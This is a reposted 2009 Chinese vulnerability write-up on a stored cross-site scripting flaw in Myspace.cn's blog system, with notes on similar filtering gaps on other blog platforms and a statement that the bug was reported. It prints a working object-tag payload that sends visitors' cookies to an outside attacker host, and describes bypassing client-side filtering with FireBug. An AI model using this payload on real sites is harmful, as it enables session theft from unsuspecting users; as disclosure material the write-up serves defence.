比较老的文章了(2009-01-07 19:46),但是有些技巧还是值得再研究的,所以就转来了,有心学习的人还可以再看看。

一 Myspace介绍:

    Myspace.cn是全球最大的社区交友网站Myspace.com的中国分站.通过在 MySpace 上创建私人社区,您可以与不断增多的共同的朋友分享照片、日志和爱好。

二 漏洞描述:

    Myspace.cn博客系统中,对object标签没有做严格过滤。导致攻击者可以在博文中加入恶意代码。

三 盗取Cookie利用代码:

<object data=data:text/html;,%3cscript%3edocument.write('%3ciframe%20src=http://www.×××.com/xss/xsscu.asp?'+escape(document.cookie)+'%20width=0%20height=0%20border=0%3e%3c/iframe%3e');%3c/script%3e>

四 利用方法:

    写博客的时候,一般方法直接写入恶意代码是会被过滤掉的。这里,我利用火狐浏览器的FireBug插件进行编辑提交。


五 接受Cookie工具:SessionIE


六 其他说明:

    (1)你用SessionIE拿到用户Cookie也是无法登录的。因为Myspace的Cookie中,MYUSERINFO选项是被HTTPONLY的。传统的document.cookie,是无法打印出这个数值的。


    (2)关于怎么插入恶意代码。通过类似FireBug的工具,进行数据提交,可以做到绕过本地HTML编码函数,直接把HTML标签注入到程序中。于是没有经过过滤的HTML标签就会发到服务端,然后能不能过滤掉恶意代码就看远程服务端程序了。

    (3)虽然Myspace,采取了COOKIE HTTPONLY杜绝了COOKIE盗用的可能性,但耐心的“黑客”,也可以通过这个漏洞进行钓鱼或蠕虫等等。

    (4)对于国内Blog系统中,写日志这个模块过滤问题,我测试后发现,新浪,搜狐,网易,BlogBus,
TOM,Blogcn,Hexun,blogger,CSDN…都存在这样的问题----日志模块没有严格过滤用户提交的数据。
所造成的危害,钓鱼,拿Cookie,传播蠕虫。

    (5)今天请教了余弦,关于同源策略的问题。其实XCON 2008我也有参加,当时kuza55的“同源策略“对Cookie,XSS,CSRFZ带来的安全隐患做了深入讨论。国内博客如Sina,163的blog,大家都在同一个域下,所以注入的js可以危害到其他用户的blog。关于blogger.com,也就是GOOGLE博客,我想提出一些疑问。首先blogger.com也出现过跨站,http://seclists.org/fulldisclosure/2007/Aug/0196.html 。现在Cookie是打印不出来了,但日志模块中,一些敏感特殊字符都没有进行过滤,比如alert,iframe等等。也许是为了用户使用方便??

PS:最近快被ThreatEX 2500折腾死了,把2139个攻击类型包,都提取成PCAP格式保存……
    已经向Myspace提交这个漏洞。